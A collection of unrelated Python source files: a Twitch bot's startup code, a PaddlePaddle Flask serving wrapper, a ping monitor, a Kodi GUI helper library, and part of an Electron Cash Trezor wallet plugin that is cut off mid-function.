self.initDone = True
self.updateFollowButtons(self.queuedChanges[0])
self.queuedChanges = self.queuedChanges[1:]
elif code >= 5 and self.messageNumber >= 5 and msg.split(" ")[0] == "ok":
self.initDone = True
else:
# don't do anything immediately
pass
def on_error(self, error):
logger.debug("WS Error: "+error)
self.ws.close()
def on_close(self):
logger.debug("Websocket closed")
MarathonBot.instance.ffz = None
def updateFollowButtons(self, channels):
if not self.initDone:
self.queuedChanges.append(channels)
else:
self.sendMessage("update_follow_buttons %s" % json.dumps([self.channelName, channels]))
curg = db.cursor()
logger.info("Fetching channel list...")
curg.execute("SELECT name FROM channels")
channels = []
for row in curg.fetchall():
channels.append("#" + row[0])
logger.debug("Channels: %s", str(channels))
curg.close()
loadConfig()
# twitch api init
checkAndRenewAppAccessToken()
# get user data for the bot itself
headers = {"Authorization": "Bearer %s" % config["appAccessToken"], "Client-ID": config["clientID"]}
r = requests.get("https://api.twitch.tv/helix/users", headers=headers,
params={"login": str(config["username"]).lower()})
j = r.json()
try:
twitchid = j["data"][0]["id"]
except Exception:
twitchid = 0
config["twitchid"] = str(twitchid)
b = NepBot(config, channels)
b.start(config["oauth"])
# marathon bot?
if booleanConfig("marathonBotFunctions"):
maraBot = MarathonBot()
maraBot.start(config["marathonOAuth"])
logger.debug("past start")
pool.handle_forever()
|
web_service.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!flask/bin/python
# pylint: disable=doc-string-missing
from flask import Flask, request, abort
from multiprocessing import Pool, Process
from paddle_serving_server import OpMaker, OpSeqMaker, Server
from paddle_serving_client import Client
class WebService(object):
def __init__(self, name="default_service"):
self.name = name
def load_model_config(self, model_config):
self.model_config = model_config
def _launch_rpc_service(self):
op_maker = OpMaker()
read_op = op_maker.create('general_reader')
general_infer_op = op_maker.create('general_infer')
general_response_op = op_maker.create('general_response')
op_seq_maker = OpSeqMaker()
op_seq_maker.add_op(read_op)
op_seq_maker.add_op(general_infer_op)
op_seq_maker.add_op(general_response_op)
server = Server()
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(16)
server.load_model_config(self.model_config)
server.prepare_server(
workdir=self.workdir, port=self.port + 1, device=self.device)
server.run_server()
def prepare_server(self, workdir="", port=9393, device="cpu"):
self.workdir = workdir
self.port = port
self.device = device
def _launch_web_service(self):
app_instance = Flask(__name__)
client_service = Client()
client_service.load_client_config(
"{}/serving_server_conf.prototxt".format(self.model_config))
client_service.connect(["0.0.0.0:{}".format(self.port + 1)])
service_name = "/" + self.name + "/prediction"
@app_instance.route(service_name, methods=['POST'])
def get_prediction():
if not request.json:
abort(400)
if "fetch" not in request.json:
abort(400)
feed, fetch = self.preprocess(request.json, request.json["fetch"])
if "fetch" in feed:
del feed["fetch"]
fetch_map = client_service.predict(feed=feed, fetch=fetch)
fetch_map = self.postprocess(
feed=request.json, fetch=fetch, fetch_map=fetch_map)
return fetch_map
app_instance.run(host="0.0.0.0",
port=self.port,
threaded=False,
processes=1)
def run_server(self):
import socket
localIP = socket.gethostbyname(socket.gethostname())
print("web service address:")
print("http://{}:{}/{}/prediction".format(localIP, self.port,
self.name))
p_rpc = Process(target=self._launch_rpc_service)
p_web = Process(target=self._launch_web_service)
p_rpc.start()
p_web.start()
p_web.join()
p_rpc.join()
def preprocess(self, feed={}, fetch=[]):
return feed, fetch
def postprocess(self, feed={}, fetch=[], fetch_map={}):
return fetch_map
|
ping.py | import logging
import subprocess
from subprocess import run, check_output, CalledProcessError, TimeoutExpired
from threading import Thread, Lock
import time
import utils.pingparse as pingparse
LOGGER = logging.getLogger(__name__)
def setup_sensor(config):
return PingMonitor(config['name'], config['host'], config['interval'], config['prefix'])
class PingMonitor:
def __init__(self, name, destination, interval=10, prefix=''):
self.name = name
self.type = 'output'
self.destination = destination
self.interval = interval
self.prefix = prefix
self.errors = 0
self.loss = 0
self.latency = []
self.total = 0
self.lock = Lock()
self.running = True
def _sleep(self, amount):
while amount > 0:
if not self.running:
break
if amount > 1:
time.sleep(1)
amount -= 1
else:
time.sleep(amount)
amount = 0
def _run(self):
while self.running:
# Run a ping
start = time.time()
try:
result = run('ping -c 1 -w 5 {}'.format(self.destination),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
timeout=10)
with self.lock:
self._parse(result)
except TimeoutExpired:
LOGGER.error("Ping command timed out")
except Exception:
LOGGER.exception("Exception occurred while pinging")
end = time.time()
sleep_time = self.interval - (end - start)
if sleep_time > 0:
# LOGGER.debug("Sleeping for %s", sleep_time)
self._sleep(sleep_time)
else:
LOGGER.warning("Sleep time is negative (%s). Ignoring...",
sleep_time)
def _parse(self, result):
if result.returncode == 0:
result = pingparse.parse(result.stdout.decode('utf8'))
self.latency.append(float(result['avgping']))
if int(result['packet_loss']) != 0:
self.loss += 1
else:
LOGGER.warning("Ping error: %s", result.stderr.decode('utf8'))
self.errors += 1
self.total += 1
def start(self):
self.sensor_thread = Thread(target=self._run)
self.sensor_thread.start()
def read(self):
with self.lock:
latency = sum(self.latency) / len(self.latency) if len(self.latency) > 0 else 0
data = {self.prefix + 'ping_errors': self.errors,
self.prefix + 'ping_latency': latency,
self.prefix + 'ping_packet_loss': self.loss,
self.prefix + 'ping_total': self.total}
self.errors = 0
self.loss = 0
self.latency = []
self.total = 0
return data
def stop(self):
self.running = False
self.sensor_thread.join()
|
kodigui.py | # -*- coding: utf-8 -*-
import xbmc
import xbmcgui
import time
import threading
import traceback
MONITOR = None
class BaseFunctions:
xmlFile = ''
path = ''
theme = ''
res = '720p'
width = 1280
height = 720
usesGenerate = False
def __init__(self):
self.isOpen = True
def onWindowFocus(self):
# Not automatically called. Can be used by an external window manager
pass
def onClosed(self):
pass
@classmethod
def open(cls, **kwargs):
window = cls(cls.xmlFile, cls.path, cls.theme, cls.res, **kwargs)
window.modal()
return window
@classmethod
def create(cls, show=True, **kwargs):
window = cls(cls.xmlFile, cls.path, cls.theme, cls.res, **kwargs)
if show:
window.show()
window.isOpen = True
return window
def modal(self):
self.isOpen = True
self.doModal()
self.onClosed()
self.isOpen = False
def activate(self):
if not self._winID:
self._winID = xbmcgui.getCurrentWindowId()
xbmc.executebuiltin('ReplaceWindow({0})'.format(self._winID))
def mouseXTrans(self, val):
return int((val / self.getWidth()) * self.width)
def mouseYTrans(self, val):
return int((val / self.getHeight()) * self.height)
def closing(self):
return self._closing
@classmethod
def generate(self):
return None
def setProperties(self, prop_list, val_list_or_val):
if isinstance(val_list_or_val, list) or isinstance(val_list_or_val, tuple):
val_list = val_list_or_val
else:
val_list = [val_list_or_val] * len(prop_list)
for prop, val in zip(prop_list, val_list):
self.setProperty(prop, val)
def propertyContext(self, prop, val='1'):
return WindowProperty(self, prop, val)
def setBoolProperty(self, key, boolean):
self.setProperty(key, boolean and '1' or '')
class BaseWindow(xbmcgui.WindowXML, BaseFunctions):
def __init__(self, *args, **kwargs):
BaseFunctions.__init__(self)
self._closing = False
self._winID = None
self.started = False
self.finishedInit = False
def onInit(self):
self._winID = xbmcgui.getCurrentWindowId()
if self.started:
self.onReInit()
else:
self.started = True
self.onFirstInit()
self.finishedInit = True
def onFirstInit(self):
pass
def onReInit(self):
pass
def setProperty(self, key, value):
if self._closing:
return
if not self._winID:
self._winID = xbmcgui.getCurrentWindowId()
try:
xbmcgui.Window(self._winID).setProperty(key, value)
xbmcgui.WindowXML.setProperty(self, key, value)
except RuntimeError:
xbmc.log('kodigui.BaseWindow.setProperty: Missing window', xbmc.LOGDEBUG)
def doClose(self):
if not self.isOpen:
return
self._closing = True
self.isOpen = False
self.close()
def show(self):
self._closing = False
self.isOpen = True
xbmcgui.WindowXML.show(self)
def onClosed(self):
pass
class BaseDialog(xbmcgui.WindowXMLDialog, BaseFunctions):
def __init__(self, *args, **kwargs):
BaseFunctions.__init__(self)
self._closing = False
self._winID = ''
self.started = False
def onInit(self):
self._winID = xbmcgui.getCurrentWindowDialogId()
if self.started:
self.onReInit()
else:
self.started = True
self.onFirstInit()
def onFirstInit(self):
pass
def onReInit(self):
pass
def setProperty(self, key, value):
if self._closing:
return
if not self._winID:
self._winID = xbmcgui.getCurrentWindowId()
try:
xbmcgui.Window(self._winID).setProperty(key, value)
xbmcgui.WindowXMLDialog.setProperty(self, key, value)
except RuntimeError:
xbmc.log('kodigui.BaseDialog.setProperty: Missing window', xbmc.LOGDEBUG)
def doClose(self):
self._closing = True
self.close()
def show(self):
self._closing = False
xbmcgui.WindowXMLDialog.show(self)
def onClosed(self):
pass
class ControlledBase:
def doModal(self):
self.show()
self.wait()
def wait(self):
while not self._closing and not MONITOR.waitForAbort(0.1):
pass
def close(self):
self._closing = True
class ControlledWindow(ControlledBase, BaseWindow):
def onAction(self, action):
try:
if action in (xbmcgui.ACTION_PREVIOUS_MENU, xbmcgui.ACTION_NAV_BACK):
self.doClose()
return
except:
traceback.print_exc()
BaseWindow.onAction(self, action)
class ControlledDialog(ControlledBase, BaseDialog):
def onAction(self, action):
try:
if action in (xbmcgui.ACTION_PREVIOUS_MENU, xbmcgui.ACTION_NAV_BACK):
self.doClose()
return
except:
traceback.print_exc()
BaseDialog.onAction(self, action)
DUMMY_LIST_ITEM = xbmcgui.ListItem()
class ManagedListItem(object):
def __init__(self, label='', label2='', iconImage='', thumbnailImage='', path='', data_source=None, properties=None):
self._listItem = xbmcgui.ListItem(label, label2, iconImage, thumbnailImage, path)
self.dataSource = data_source
self.properties = {}
self.label = label
self.label2 = label2
self.iconImage = iconImage
self.thumbnailImage = thumbnailImage
self.path = path
self._ID = None
self._manager = None
self._valid = True
if properties:
for k, v in properties.items():
self.setProperty(k, v)
def __nonzero__(self):
return self._valid
@property
def listItem(self):
if not self._listItem:
if not self._manager:
return None
try:
self._listItem = self._manager.getListItemFromManagedItem(self)
except RuntimeError:
return None
return self._listItem
def invalidate(self):
self._valid = False
self._listItem = DUMMY_LIST_ITEM
def _takeListItem(self, manager, lid):
self._manager = manager
self._ID = lid
self._listItem.setProperty('__ID__', lid)
li = self._listItem
self._listItem = None
self._manager._properties.update(self.properties)
return li
def _updateListItem(self):
self.listItem.setProperty('__ID__', self._ID)
self.listItem.setLabel(self.label)
self.listItem.setLabel2(self.label2)
self.listItem.setIconImage(self.iconImage)
self.listItem.setThumbnailImage(self.thumbnailImage)
self.listItem.setPath(self.path)
for k in self._manager._properties.keys():
self.listItem.setProperty(k, self.properties.get(k) or '')
def clear(self):
self.label = ''
self.label2 = ''
self.iconImage = ''
self.thumbnailImage = ''
self.path = ''
for k in self.properties:
self.properties[k] = ''
self._updateListItem()
def pos(self):
if not self._manager:
return None
return self._manager.getManagedItemPosition(self)
def addContextMenuItems(self, items, replaceItems=False):
self.listItem.addContextMenuItems(items, replaceItems)
def addStreamInfo(self, stype, values):
self.listItem.addStreamInfo(stype, values)
def getLabel(self):
return self.label
def getLabel2(self):
return self.label2
def getProperty(self, key):
return self.properties.get(key, '')
def getdescription(self):
return self.listItem.getdescription()
def getduration(self):
return self.listItem.getduration()
def getfilename(self):
return self.listItem.getfilename()
def isSelected(self):
return self.listItem.isSelected()
def select(self, selected):
return self.listItem.select(selected)
def setArt(self, values):
return self.listItem.setArt(values)
def setIconImage(self, icon):
self.iconImage = icon
return self.listItem.setIconImage(icon)
def setInfo(self, itype, infoLabels):
return self.listItem.setInfo(itype, infoLabels)
def setLabel(self, label):
self.label = label
return self.listItem.setLabel(label)
def setLabel2(self, label):
self.label2 = label
return self.listItem.setLabel2(label)
def setMimeType(self, mimetype):
return self.listItem.setMimeType(mimetype)
def setPath(self, path):
self.path = path
return self.listItem.setPath(path)
def setProperty(self, key, value):
if self._manager:
self._manager._properties[key] = 1
self.properties[key] = value
self.listItem.setProperty(key, value)
return self
def setBoolProperty(self, key, boolean):
return self.setProperty(key, boolean and '1' or '')
def setSubtitles(self, subtitles):
return self.listItem.setSubtitles(subtitles) # List of strings - HELIX
def setThumbnailImage(self, thumb):
self.thumbnailImage = thumb
return self.listItem.setThumbnailImage(thumb)
def onDestroy(self):
pass
class ManagedControlList(object):
def __init__(self, window, control_id, max_view_index, data_source=None):
self.controlID = control_id
self.control = window.getControl(control_id)
self.items = []
self._sortKey = None
self._idCounter = 0
self._maxViewIndex = max_view_index
self._properties = {}
self.dataSource = data_source
def __getattr__(self, name):
return getattr(self.control, name)
def __getitem__(self, idx):
if isinstance(idx, slice):
return self.items[idx]
else:
return self.getListItem(idx)
def __iter__(self):
for i in self.items:
yield i
def __len__(self):
return self.size()
def _updateItems(self, bottom=None, top=None):
if bottom is None:
bottom = 0
top = self.size()
try:
for idx in range(bottom, top):
li = self.control.getListItem(idx)
mli = self.items[idx]
self._properties.update(mli.properties)
mli._manager = self
mli._listItem = li
mli._updateListItem()
except RuntimeError:
xbmc.log('kodigui.ManagedControlList._updateItems: Runtime error', xbmc.LOGNOTICE)
return False
return True
def _nextID(self):
self._idCounter += 1
return str(self._idCounter)
def reInit(self, window, control_id):
self.controlID = control_id
self.control = window.getControl(control_id)
self.control.addItems([i._takeListItem(self, self._nextID()) for i in self.items])
def setSort(self, sort):
self._sortKey = sort
def addItem(self, managed_item):
self.items.append(managed_item)
self.control.addItem(managed_item._takeListItem(self, self._nextID()))
def addItems(self, managed_items):
self.items += managed_items
self.control.addItems([i._takeListItem(self, self._nextID()) for i in managed_items])
def replaceItem(self, pos, mli):
self[pos].onDestroy()
self[pos].invalidate()
self.items[pos] = mli
li = self.control.getListItem(pos)
mli._manager = self
mli._listItem = li
mli._updateListItem()
def replaceItems(self, managed_items):
if not self.items:
self.addItems(managed_items)
return True
oldSize = self.size()
for i in self.items:
i.onDestroy()
i.invalidate()
self.items = managed_items
size = self.size()
if size != oldSize:
pos = self.getSelectedPosition()
if size > oldSize:
for i in range(0, size - oldSize):
self.control.addItem(xbmcgui.ListItem())
elif size < oldSize:
diff = oldSize - size
idx = oldSize - 1
while diff:
self.control.removeItem(idx)
idx -= 1
diff -= 1
if self.positionIsValid(pos):
self.selectItem(pos)
elif pos >= size:
self.selectItem(size - 1)
self._updateItems(0, self.size())
def getListItem(self, pos):
li = self.control.getListItem(pos)
mli = self.items[pos]
mli._listItem = li
return mli
def getListItemByDataSource(self, data_source):
for mli in self:
if data_source == mli.dataSource:
return mli
return None
def getSelectedItem(self):
pos = self.control.getSelectedPosition()
if not self.positionIsValid(pos):
pos = self.size() - 1
if pos < 0:
return None
return self.getListItem(pos)
def removeItem(self, index):
old = self.items.pop(index)
old.onDestroy()
old.invalidate()
self.control.removeItem(index)
top = self.control.size() - 1
if top < 0:
return
if top < index:
index = top
self.control.selectItem(index)
def removeManagedItem(self, mli):
self.removeItem(mli.pos())
def insertItem(self, index, managed_item):
pos = self.getSelectedPosition() + 1
if index >= self.size() or index < 0:
self.addItem(managed_item)
else:
self.items.insert(index, managed_item)
self.control.addItem(managed_item._takeListItem(self, self._nextID()))
self._updateItems(index, self.size())
if self.positionIsValid(pos):
self.selectItem(pos)
def moveItem(self, mli, dest_idx):
source_idx = mli.pos()
if source_idx < dest_idx:
rstart = source_idx
rend = dest_idx + 1
# dest_idx-=1
else:
rstart = dest_idx
rend = source_idx + 1
mli = self.items.pop(source_idx)
self.items.insert(dest_idx, mli)
self._updateItems(rstart, rend)
def swapItems(self, pos1, pos2):
if not self.positionIsValid(pos1) or not self.positionIsValid(pos2):
return False
item1 = self.items[pos1]
item2 = self.items[pos2]
li1 = item1._listItem
li2 = item2._listItem
item1._listItem = li2
item2._listItem = li1
item1._updateListItem()
item2._updateListItem()
self.items[pos1] = item2
self.items[pos2] = item1
return True
def shiftView(self, shift, hold_selected=False):
if not self._maxViewIndex:
return
selected = self.getSelectedItem()
selectedPos = selected.pos()
viewPos = self.getViewPosition()
if shift > 0:
pushPos = selectedPos + (self._maxViewIndex - viewPos) + shift
if pushPos >= self.size():
pushPos = self.size() - 1
self.selectItem(pushPos)
newViewPos = self._maxViewIndex
elif shift < 0:
pushPos = (selectedPos - viewPos) + shift
if pushPos < 0:
pushPos = 0
self.selectItem(pushPos)
newViewPos = 0
if hold_selected:
self.selectItem(selected.pos())
else:
diff = newViewPos - viewPos
fix = pushPos - diff
# print '{0} {1} {2}'.format(newViewPos, viewPos, fix)
if self.positionIsValid(fix):
self.selectItem(fix)
def reset(self):
self.dataSource = None
for i in self.items:
i.onDestroy()
i.invalidate()
self.items = []
self.control.reset()
def size(self):
return len(self.items)
def getViewPosition(self):
try:
return int(xbmc.getInfoLabel('Container({0}).Position'.format(self.controlID)))
except:
return 0
def getViewRange(self):
viewPosition = self.getViewPosition()
selected = self.getSelectedPosition()
return range(max(selected - viewPosition, 0), min(selected + (self._maxViewIndex - viewPosition) + 1, self.size() - 1))
def positionIsValid(self, pos):
return 0 <= pos < self.size()
def sort(self, sort=None, reverse=False):
sort = sort or self._sortKey
self.items.sort(key=sort, reverse=reverse)
self._updateItems(0, self.size())
def reverse(self):
self.items.reverse()
self._updateItems(0, self.size())
def getManagedItemPosition(self, mli):
return self.items.index(mli)
def getListItemFromManagedItem(self, mli):
pos = self.items.index(mli)
return self.control.getListItem(pos)
def topHasFocus(self):
return self.getSelectedPosition() == 0
def bottomHasFocus(self):
return self.getSelectedPosition() == self.size() - 1
def invalidate(self):
for item in self.items:
item._listItem = DUMMY_LIST_ITEM
def newControl(self, window=None, control_id=None):
self.controlID = control_id or self.controlID
self.control = window.getControl(self.controlID)
self.control.addItems([xbmcgui.ListItem() for i in range(self.size())])
self._updateItems()
class _MWBackground(ControlledWindow):
def __init__(self, *args, **kwargs):
self._multiWindow = kwargs.get('multi_window')
self.started = False
BaseWindow.__init__(self, *args, **kwargs)
def onInit(self):
if self.started:
return
self.started = True
self._multiWindow._open()
self.close()
class MultiWindow(object):
def __init__(self, windows=None, default_window=None, **kwargs):
self._windows = windows
self._next = default_window or self._windows[0]
self._properties = {}
self._current = None
self._allClosed = False
self.exitCommand = None
def __getattr__(self, name):
return getattr(self._current, name)
def setWindows(self, windows):
self._windows = windows
def setDefault(self, default):
self._next = default or self._windows[0]
def windowIndex(self, window):
if hasattr(window, 'MULTI_WINDOW_ID'):
for i, w in enumerate(self._windows):
if window.MULTI_WINDOW_ID == w.MULTI_WINDOW_ID:
return i
return 0
else:
return self._windows.index(window.__class__)
def nextWindow(self, window=None):
if window is False:
window = self._windows[self.windowIndex(self._current)]
if window:
if window.__class__ == self._current.__class__:
return None
else:
idx = self.windowIndex(self._current)
idx += 1
if idx >= len(self._windows):
idx = 0
window = self._windows[idx]
self._next = window
self._current.doClose()
return self._next
def _setupCurrent(self, cls):
self._current = cls(cls.xmlFile, cls.path, cls.theme, cls.res)
self._current.onFirstInit = self._onFirstInit
self._current.onReInit = self.onReInit
self._current.onClick = self.onClick
self._current.onFocus = self.onFocus
self._currentOnAction = self._current.onAction
self._current.onAction = self.onAction
@classmethod
def open(cls, **kwargs):
mw = cls(**kwargs)
b = _MWBackground(mw.bgXML, mw.path, mw.theme, mw.res, multi_window=mw)
b.modal()
del b
import gc
gc.collect(2)
return mw
def _open(self):
while not xbmc.abortRequested and not self._allClosed:
self._setupCurrent(self._next)
self._current.modal()
self._current.doClose()
del self._current
del self._next
del self._currentOnAction
def setProperty(self, key, value):
self._properties[key] = value
self._current.setProperty(key, value)
def _onFirstInit(self):
for k, v in self._properties.items():
self._current.setProperty(k, v)
self.onFirstInit()
def doClose(self):
self._allClosed = True
self._current.doClose()
def onFirstInit(self):
pass
def onReInit(self):
pass
def onAction(self, action):
if action == xbmcgui.ACTION_PREVIOUS_MENU or action == xbmcgui.ACTION_NAV_BACK:
self.doClose()
self._currentOnAction(action)
def onClick(self, controlID):
pass
def onFocus(self, controlID):
pass
class SafeControlEdit(object):
CHARS_LOWER = 'abcdefghijklmnopqrstuvwxyz'
CHARS_UPPER = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
CHARS_NUMBERS = '0123456789'
CURSOR = '[COLOR FFCC7B19]|[/COLOR]'
def __init__(self, control_id, label_id, window, key_callback=None, grab_focus=False):
self.controlID = control_id
self.labelID = label_id
self._win = window
self._keyCallback = key_callback
self.grabFocus = grab_focus
self._text = ''
self.setup()
def setup(self):
self._labelControl = self._win.getControl(self.labelID)
self._winOnAction = self._win.onAction
self._win.onAction = self.onAction
self.updateLabel()
def onAction(self, action):
try:
controlID = self._win.getFocusId()
if controlID == self.controlID:
if self.processAction(action.getId()):
return
elif self.grabFocus:
if self.processOffControlAction(action.getButtonCode()):
self._win.setFocusId(self.controlID)
return
except:
traceback.print_exc()
self._winOnAction(action)
def processAction(self, action_id):
if 61793 <= action_id <= 61818: # Lowercase
self.processChar(self.CHARS_LOWER[action_id - 61793])
elif 61761 <= action_id <= 61786: # Uppercase
self.processChar(self.CHARS_UPPER[action_id - 61761])
elif 61744 <= action_id <= 61753:
self.processChar(self.CHARS_NUMBERS[action_id - 61744])
elif action_id == 61728: # Space
self.processChar(' ')
elif action_id == 61448:
self.delete()
else:
return False
if self._keyCallback:
self._keyCallback()
return True
def processOffControlAction(self, action_id):
if 61505 <= action_id <= 61530: # Lowercase
self.processChar(self.CHARS_LOWER[action_id - 61505])
elif 192577 <= action_id <= 192602: # Uppercase
self.processChar(self.CHARS_UPPER[action_id - 192577])
elif 61488 <= action_id <= 61497:
self.processChar(self.CHARS_NUMBERS[action_id - 61488])
elif 61552 <= action_id <= 61561:
self.processChar(self.CHARS_NUMBERS[action_id - 61552])
elif action_id == 61472: # Space
self.processChar(' ')
# elif action_id == 61448:
# self.delete()
else:
return False
if self._keyCallback:
self._keyCallback()
return True
def updateLabel(self):
self._labelControl.setLabel(self._text + self.CURSOR)
def processChar(self, char):
self._text += char
self.updateLabel()
def setText(self, text):
self._text = text
self.updateLabel()
def getText(self):
return self._text
def append(self, text):
self._text += text
self.updateLabel()
def delete(self):
self._text = self._text[:-1]
self.updateLabel()
class PropertyTimer():
def __init__(self, window_id, timeout, property_, value='', init_value='1', addon_id=None, callback=None):
self._winID = window_id
self._timeout = timeout
self._property = property_
self._value = value
self._initValue = init_value
self._endTime = 0
self._thread = None
self._addonID = addon_id
self._closeWin = None
self._closed = False
self._callback = callback
def _onTimeout(self):
self._endTime = 0
xbmcgui.Window(self._winID).setProperty(self._property, self._value)
if self._addonID:
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self._property), self._value)
if self._closeWin:
self._closeWin.doClose()
if self._callback:
self._callback()
def _wait(self):
while not xbmc.abortRequested and time.time() < self._endTime:
xbmc.sleep(100)
if xbmc.abortRequested:
return
if self._endTime == 0:
return
self._onTimeout()
def _stopped(self):
return not self._thread or not self._thread.isAlive()
def _reset(self):
self._endTime = time.time() + self._timeout
def _start(self):
self.init(self._initValue)
self._thread = threading.Thread(target=self._wait)
self._thread.start()
def stop(self, trigger=False):
self._endTime = trigger and 1 or 0
if not self._stopped():
self._thread.join()
def close(self):
self._closed = True
self.stop()
def init(self, val):
if val is False:
return
elif val is None:
val = self._initValue
xbmcgui.Window(self._winID).setProperty(self._property, val)
if self._addonID:
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self._property), val)
def reset(self, close_win=None, init=None):
self.init(init)
if self._closed:
return
if not self._timeout:
return
self._closeWin = close_win
self._reset()
if self._stopped:
self._start()
class WindowProperty():
def __init__(self, win, prop, val='1', end=None):
self.win = win
self.prop = prop
self.val = val
self.end = end
self.old = self.win.getProperty(self.prop)
def __enter__(self):
self.win.setProperty(self.prop, self.val)
return self
def __exit__(self, exc_type, exc_value, traceback):
self.win.setProperty(self.prop, self.end or self.old)
class GlobalProperty():
def __init__(self, prop, val='1', end=None):
import xbmcaddon
self._addonID = xbmcaddon.Addon().getAddonInfo('id')
self.prop = prop
self.val = val
self.end = end
self.old = xbmc.getInfoLabel('Window(10000).Property({0}}.{1})'.format(self._addonID, prop))
def __enter__(self):
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self.prop), self.val)
return self
def __exit__(self, exc_type, exc_value, traceback):
xbmcgui.Window(10000).setProperty('{0}.{1}'.format(self._addonID, self.prop), self.end or self.old)
|
plugin.py | import threading
from binascii import hexlify, unhexlify
from electroncash.util import bfh, bh2u
from electroncash.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT)
from electroncash.i18n import _
from electroncash.networks import NetworkConstants
from electroncash.plugins import BasePlugin
from electroncash.transaction import deserialize
from electroncash.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
try:
return self.hid_transport(device)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never returns if keepkey is plugged
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
# Note: testnet supported only by unofficial firmware
return "Bcash Testnet" if NetworkConstants.TESTNET else "Bcash"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
# FIXME the PIN prompt will appear over this message
# which makes this unreadable
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
